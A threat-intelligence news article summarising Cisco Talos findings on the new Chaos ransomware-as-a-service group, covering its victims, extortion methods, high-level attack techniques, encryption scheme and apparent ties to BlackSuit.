The new Chaos RaaS group is emerging as a dangerous player in the ransomware landscape. Cisco Talos Incident Response investigated several attacks by this new group.
Chaos carries out so-called big-game hunting and double extortion attacks. Victims are not only held hostage through data encryption. The attackers also threaten to disclose the data. The attack chain often starts with large-scale spam, followed by telephone social engineering and the misuse of legitimate management tools for persistent access and data theft.
Chaos uses fast-acting, selective file encryption and applies anti-analysis measures that make detection and recovery difficult. It is noteworthy that this group appears to have no connection with previous ransomware versions originating from the Chaos builder. The name is probably being reused deliberately to cause confusion within the security community.
No specific sector targeted
The victims of Chaos are diverse and mainly located in the United States, with a few reports from the United Kingdom, New Zealand, and India. There does not appear to be a specific sector being targeted. Chaos offers its ransomware via the Russian dark web forum RAMP and actively recruits affiliates. The software supports multiple platforms such as Windows, Linux, ESXi, and NAS and includes features such as individual encryption keys, high speed, and network exploration.
Attackers use automated control panels with an access system that reimburses affiliates after a successful attack. In their communications, they state that they do not cooperate with targets in BRICS/CIS countries, governments, or hospitals. Chaos publishes leaked data from non-paying victims on its own leak website and demands ransom without specifying amounts in advance, but offers communication via onion URLs.
In one attack investigated, the group demanded $300,000 in exchange for decryption tools, a penetration test report, and a promise to delete data. If the victim does not pay, Chaos threatens a DDoS attack and reputational damage.
Wide range of attack techniques
Chaos’ attack methodology includes techniques such as voice phishing, misuse of remote management tools such as AnyDesk and ScreenConnect, and the use of legitimate software such as GoodSync for data theft. Talos identified a wide range of tactics and techniques, including privilege escalation via token impersonation, registry key modification, and the setup of reverse SSH tunnels for command and control.
Chaos uses strong encryption with a hybrid approach via ECDH and AES-256. Each encrypted file is assigned a unique key and provided with metadata. The ransomware avoids encrypting system-critical files to prevent instability and excludes previously encrypted files with a .chaos extension.
Analysis of the encryptor points to compilation dates in early 2025, indicating that operations have started recently. The ransomware detects and evades analysis environments such as sandboxes and debugger tools using hash-based recognition and timing checks. The ransom note is decrypted using an XOR algorithm and stored in a text file.
Noteworthy are the similarities with the modus operandi of BlackSuit (Royal), including the use of similar encryption parameters, ransomware commands, and the structure of the ransom note. These parallels reinforce suspicions that Chaos may be a relaunch of or run by former members of BlackSuit.